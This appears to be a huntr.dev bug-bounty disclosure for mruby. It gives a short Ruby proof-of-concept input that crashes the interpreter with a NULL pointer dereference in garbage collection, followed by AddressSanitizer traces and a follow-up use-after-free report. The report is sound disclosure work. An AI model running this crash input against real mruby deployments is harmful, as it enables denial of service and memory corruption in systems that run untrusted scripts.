NULL Pointer Dereference in mruby/mruby
Valid
Reported on
Dec 10th 2021
Description
NULL Pointer Dereference in mrb_full_gc
Proof of Concept
( *a = () )
a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}}
Result
./master/asan_mruby/bin/mirb ./crash.rb
mirb - Embeddable Interactive Ruby Shell
=> nil
AddressSanitizer:DEADLYSIGNAL
=================================================================
==21352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556b44382444 bp 0x7fff4e9961d0 sp 0x7fff4e9961b0 T0)
==21352==The signal is caused by a READ memory access.
==21352==Hint: address points to the zero page.
#0 0x556b44382443 in mrb_full_gc /root/master/asan_mruby/src/gc.c:1317
#1 0x556b4438276b in mrb_garbage_collect /root/master/asan_mruby/src/gc.c:1350
#2 0x556b44386737 in mrb_irep_incref /root/master/asan_mruby/src/state.c:114
#3 0x556b4444780a in mrb_proc_copy /root/master/asan_mruby/src/proc.c:213
#4 0x556b44448162 in proc_lambda /root/master/asan_mruby/src/proc.c:284
#5 0x556b4439f98c in mrb_vm_exec /root/master/asan_mruby/src/vm.c:1637
#6 0x556b44391018 in mrb_vm_run /root/master/asan_mruby/src/vm.c:1091
#7 0x556b443034eb in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:670
#8 0x7f192ee230b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#9 0x556b4430048d in _start (/root/master/asan_mruby/bin/mirb+0xbe48d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/master/asan_mruby/src/gc.c:1317 in mrb_full_gc
==21352==ABORTING
We are processing your report and will contact the
mruby
team within 24 hours.
2 years ago
We have contacted a member of the
mruby
team and are waiting to hear back
2 years ago
Hi @Matz, Look like your fix is incomplete.
mruby/bin/mirb test.rb
mirb - Embeddable Interactive Ruby Shell
=> nil
too many irep references (RuntimeError)
=================================================================
==4326==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a6 at pc 0x555880ee8b49 bp 0x7ffd45311cb0 sp 0x7ffd45311ca0
READ of size 1 at 0x6070000003a6 thread T0
#0 0x555880ee8b48 in mrb_irep_cutref /root/master/asan_mruby/src/state.c:138
#1 0x555880ee2170 in obj_free /root/master/asan_mruby/src/gc.c:871
#2 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
#3 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
#4 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
#5 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
#6 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#7 0x555880e6248d in _start (/root/master/asan_mruby/bin/mirb+0xbf48d)
0x6070000003a6 is located 6 bytes inside of 72-byte region [0x6070000003a0,0x6070000003e8)
freed by thread T0 here:
#0 0x7fa03caf47cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
#1 0x555880ee87a3 in mrb_default_allocf /root/master/asan_mruby/src/state.c:64
#2 0x555880edeb69 in mrb_free /root/master/asan_mruby/src/gc.c:288
#3 0x555880ee9198 in mrb_irep_free /root/master/asan_mruby/src/state.c:174
#4 0x555880ee8af7 in mrb_irep_decref /root/master/asan_mruby/src/state.c:128
#5 0x555880ee2183 in obj_free /root/master/asan_mruby/src/gc.c:873
#6 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
#7 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
#8 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
#9 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
#10 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
previously allocated by thread T0 here:
#0 0x7fa03caf4ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
#1 0x555880ee87bd in mrb_default_allocf /root/master/asan_mruby/src/state.c:68
#2 0x555880ede83e in mrb_realloc_simple /root/master/asan_mruby/src/gc.c:226
#3 0x555880ede940 in mrb_realloc /root/master/asan_mruby/src/gc.c:240
#4 0x555880edea2d in mrb_malloc /root/master/asan_mruby/src/gc.c:256
#5 0x555880ee931a in mrb_add_irep /root/master/asan_mruby/src/state.c:208
#6 0x555880f69f00 in scope_add_irep /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3641
#7 0x555880f6a361 in scope_new /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3671
#8 0x555880f592b8 in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1294
#9 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
#10 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
#11 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#12 0x555880f5b006 in gen_values /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1563
#13 0x555880f5ba5c in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1668
#14 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#15 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
#16 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
#17 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
#18 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
#19 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#20 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
#21 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
#22 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
#23 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
#24 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#25 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
#26 0x555880f5a801 in scope_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1473
#27 0x555880f612ae in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2494
#28 0x555880f6c43d in generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3888
#29 0x555880f6c815 in mrb_generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3911
SUMMARY: AddressSanitizer: heap-use-after-free /root/master/asan_mruby/src/state.c:138 in mrb_irep_cutref
Shadow bytes around the buggy address:
0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fd fd
0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0e7fff8060: fd fa fa fa fa fa fd fd fd fd fd fd fd fd fd fa
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==4326==ABORTING
Robert Scott
commented
2 years ago
^ Disregard this. What presumably happened is the followup to this became https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e/
to join this conversation